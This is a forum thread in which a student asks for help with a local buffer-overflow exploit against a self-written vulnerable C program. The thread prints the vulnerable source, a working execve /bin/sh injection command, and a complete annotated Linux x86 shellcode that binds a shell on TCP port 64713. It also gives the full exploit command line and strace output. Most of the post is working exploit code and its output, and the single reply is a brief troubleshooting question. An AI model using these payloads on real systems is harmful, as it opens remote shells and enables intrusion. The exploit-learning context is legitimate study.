Problems with shellcode

[Seppel_S]

Hi there,
I'm new to this forum and I hope I can get some help here (and of course I hope I can help other people :-) ). Let's come to the topic:

I'm playing around with buffer overflows because of a project at university.
What I am trying to do is to exploit a really stupid selfwritter server remotely.

The problem is the shellcode, which I did not write myself (shame on me ) but I found on milw0rm. To avoid complications beause of the network I'm now trying local buffer overflows first:

[code]
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void A(char * args) {
char buffer[128];
printf("Adresse von buffer: %x\n\n", buffer);
memset(buffer, 'B', sizeof(buffer));
strcpy(buffer, args);
printf("\nbuff: [%s] (%p)(%d/%d)\n\n", &buffer, buffer, sizeof(buffer), strlen(buffer));
}

int main(int argc, char * argv[]) {
A(argv[1]);
return 0;
}
[code]

That one works fine with a stupid execve shellcode like this (that was for a smaller buffer...):
[code]
./target `perl -e '{ print "\x90\x90\x90\x90\xeb\x14\x5b\x31\xc0\x99\x88\x43\ x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\xb0\x0b\xc d\x80\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\ x68"; print "AAAAAA"; print "\x40\xf8\xff\xbf"; }'`
[code]

Now I'm trying this shellcode:
[code]
/*
* linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86
* Copyright (c) 2006 Gotfault Security <xgc@gotfault.net>
*
* portbind shellcode that bind()'s a shell on port 64713/tcp
*
*/

char shellcode[] =

/* socket(AF_INET, SOCK_STREAM, 0) */

"\x6a\x66" // push $0x66
"\x58" // pop %eax
"\x6a\x01" // push $0x1
"\x5b" // pop %ebx
"\x99" // cltd
"\x52" // push %edx
"\x53" // push %ebx
"\x6a\x02" // push $0x2
"\x89\xe1" // mov %esp,%ecx
"\xcd\x80" // int $0x80

/* bind(s, server, sizeof(server)) */

"\x52" // push %edx
"\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713
"\x66\x6a\x02" // pushw $0x2
"\x89\xe1" // mov $esp,%ecx
"\x6a\x10" // push $0x10
"\x51" // push %ecx
"\x50" // push %eax
"\x89\xe1" // mov %esp,%ecx
"\x89\xc6" // mov %eax,%esi
"\x43" // inc %ebx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80

/* listen(s, anything) */

"\xb0\x66" // mov $0x66,%al
"\xd1\xe3" // shl %ebx
"\xcd\x80" // int $0x80

/* accept(s, 0, 0) */

"\x52" // push %edx
"\x56" // push %esi
"\x89\xe1" // mov %esp,%ecx
"\x43" // inc %ebx
"\xb0\x66" // mov $0x66,%al
"\xcd\x80" // int $0x80

"\x93" // xchg %eax,%ebx

/* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */

"\x6a\x02" // push $0x2
"\x59" // pop %ecx

"\xb0\x3f" // mov $0x3f,%al
"\xcd\x80" // int $0x80
"\x49" // dec %ecx
"\x79\xf9" // jns dup_loop

/* execve("/bin/sh", ["/bin/sh"], NULL) */

"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80

int main() {

int (*f)() = (int(*)())shellcode;
printf("Length: %u\n", strlen(shellcode));
f();
}

// milw0rm.com [2006-04-06]
[code]
If I execute that programm the shell on port 64731 works fine. But if I use that shellcode on my target, it crashes before execve():

Code:

pentest@****up:~$ ./testoverflow `perl -e 'print "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; print "A"x46; print "\x18\xf4\xff\xbf";'`
Adresse von buffer: bffff418


buff: [jfXj
[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
                                                              XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)

^C
pentest@****up:~$ strace ./testoverflow `perl -e 'print "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; print "A"x46; print "\x18\xf4\xff\xbf";'`
execve("./testoverflow", ["./testoverflow", "jfXj\1[\231RSj\2\211\341\315\200Rfh\374\311fj\2\211\341j\20QP\211\341\211"...], [/* 37 vars */]) = 0
brk(0)                                  = 0x804b000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=74923, ...}) = 0
mmap2(NULL, 74923, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fcc000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320h\1\0004\0\0\0\344"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e69000
mprotect(0xb7fc5000, 4096, PROT_NONE)   = 0
mmap2(0xb7fc6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb7fc6000
mmap2(0xb7fc9000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fc9000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e68000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e686c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
open("/dev/urandom", O_RDONLY)          = 3
read(3, "FN."..., 3)                    = 3
close(3)                                = 0
mprotect(0xb7fc6000, 8192, PROT_READ)   = 0
mprotect(0x8049000, 4096, PROT_READ)    = 0
mprotect(0xb7ffe000, 4096, PROT_READ)   = 0
munmap(0xb7fcc000, 74923)               = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fde000
write(1, "Adresse von buffer: bffff418\n\n"..., 30Adresse von buffer: bffff418

) = 30
write(1, "\n"..., 1
)                    = 1
write(1, "buff: [jfXj\1[\231RSj\2\211\341\315\200Rfh\374\311fj\2\211\341j"..., 168buff: [jfXj
[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
                                                                XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)

) = 168
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(64713), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 3221222540)                   = 0
accept(3, 0, 0x3)                       = 4
dup2(4, 2)                              = 2
dup2(4, 1)                              = 1
dup2(4, 0)                              = 0
--- SIGSEGV (Segmentation fault) @ 0 (0) ---
+++ killed by SIGSEGV +++

Does anybody have an idea how I can solve this problem. I've tried multiple shellcodes now, but no shellcode complexer than the first one works (but they all do if I call them without an overflow - weird).

Regards,

Seppel

[thorin]

Do the quoted ld.so.* files exist as shown in the error output?